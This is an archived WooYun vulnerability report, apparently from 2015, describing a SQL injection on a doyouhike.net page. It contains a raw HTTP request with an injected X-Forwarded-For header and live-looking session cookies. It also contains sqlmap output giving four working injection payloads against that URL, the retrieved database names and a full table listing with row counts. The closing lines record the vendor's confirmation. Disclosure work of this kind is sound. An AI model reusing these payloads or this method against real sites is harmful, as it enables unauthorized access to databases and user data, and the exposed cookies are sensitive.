乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-28: 细节已通知厂商并且等待厂商处理中 2015-07-28: 厂商已经确认,细节仅向厂商公开 2015-08-07: 细节向核心白帽子及相关领域专家公开 2015-08-17: 细节向普通白帽子公开 2015-08-27: 细节向实习白帽子公开 2015-09-11: 细节向公众公开
3
GET /special/redbull/rbandme?act=share&id=25618 HTTP/1.1X-Forwarded-For: 8.8.8.8'X-Requested-With: XMLHttpRequestReferer: http://www.doyouhike.net:80/Cookie: PHPSESSID=uoofv3pje83gcolufsiuhkvv82; dyh_lastactivity=1438056935; ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a679b5af1ff1cd20a55a43fc6f43c843%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22120.195.159.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F53%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1438056634%3B%7D6a16e4a1bbe5941fcd220f4c007b4b63; dicc_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aeb97d17cc43a03c3a30e268f82ab1c8%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22118.252.10.148%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A107%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%3B+WOW64%29+AppleWebKit%2F537.21+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.21%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1438056787%3B%7Dd373e9310f2b37bb4fb250d9f3b9dff9Host: www.doyouhike.netConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 379 HTTP(s) requests:---Parameter: #1* (URI) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: http://www.doyouhike.net:80/special/redbull/rbandme?act=share&id=-7885 OR 2985=2985#21=6 AND 28=28 Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: http://www.doyouhike.net:80/special/redbull/rbandme?act=share&id=-1487 OR 1 GROUP BY CONCAT(0x717a7a6b71,(SELECT (CASE WHEN (2897=2897) THEN 1 ELSE 0 END)),0x7171626b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#21=6 AND 28=28 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT) Payload: http://www.doyouhike.net:80/special/redbull/rbandme?act=share&id=25618 AND 3;(SELECT * FROM (SELECT(SLEEP(5)))HkRB)21=6 AND 28=28 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: http://www.doyouhike.net:80/special/redbull/rbandme?act=share&id=25618 AND 3 AND (SELECT * FROM (SELECT(SLEEP(5)))NOgr)#21=6 AND 28=28---[13:39:49] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0.11[13:39:49] [INFO] fetching database names[13:39:49] [INFO] the SQL query used returns 3 entries[13:39:49] [INFO] retrieved: information_schema[13:39:49] [INFO] retrieved: yp[13:39:50] [INFO] retrieved: yp_testavailable databases [3]:[*] information_schema[*] yp[*] yp_test[13:39:50] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 360 times[13:39:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.doyouhike.net'[*] shutting down at 13:39:50
Database: yp+---------------------+---------+| Table | Entries |+---------------------+---------+| yp_events | 4154689 || gator | 1772514 || yp_clicks | 83356 || yp_search | 50495 || yp_images | 24682 || biz_image | 24670 || redbull_applys | 15675 || yp_posts | 15350 || yp_adminlogs | 13543 || yp_nodes | 11721 || yp_node2loc | 7023 || yp_comments | 3698 || yp_rooms | 3594 || yp_products | 2765 || yp_msg2node | 2577 || yp_feedbacks | 1897 || redbull_imgs | 907 || redbull_applys_bak | 651 || redbull_supply | 558 || yp_room_comments | 498 || yp_mail_companies | 494 || yp_product_comments | 470 || yp_claims | 412 || yp_post_categories | 331 || yp_locations | 230 || tp_clicks | 139 || yp_node_logs | 130 || yp_promotion | 110 || yp_node2union | 102 || gator_supply | 49 || yp_myhostels | 41 || yp_ads | 39 || yp_msgs | 35 || redbull_huges | 33 || yp_slides | 26 || tp_cadidates | 25 || yp_mail_history | 25 || safety_comments | 21 || yp_types | 19 || yp_ads_box | 16 || yp_managers | 14 || gator_stations | 13 || tp_locations | 11 || yp_links | 11 || yp_modules | 10 || redbull_stations | 7 || yp_sys | 7 || tp_managers | 5 || tp_plugins | 5 || safety_members | 2 || tp_sys | 2 || yp_ads_rel | 2 || yp_config | 2 || yp_unions | 2 || gator_setting | 1 || redbull_setting | 1 || safety_news | 1 || safety_sys | 1 || tp_logs | 1 || yp_notify | 1 |+---------------------+---------+[13:41:50] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 131 times[13:41:50] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\www.doyouhike.net'[*] shutting down at 13:41:50
危害等级:中
漏洞Rank:9
确认时间:2015-07-28 19:35
参数过滤不当,感谢
暂无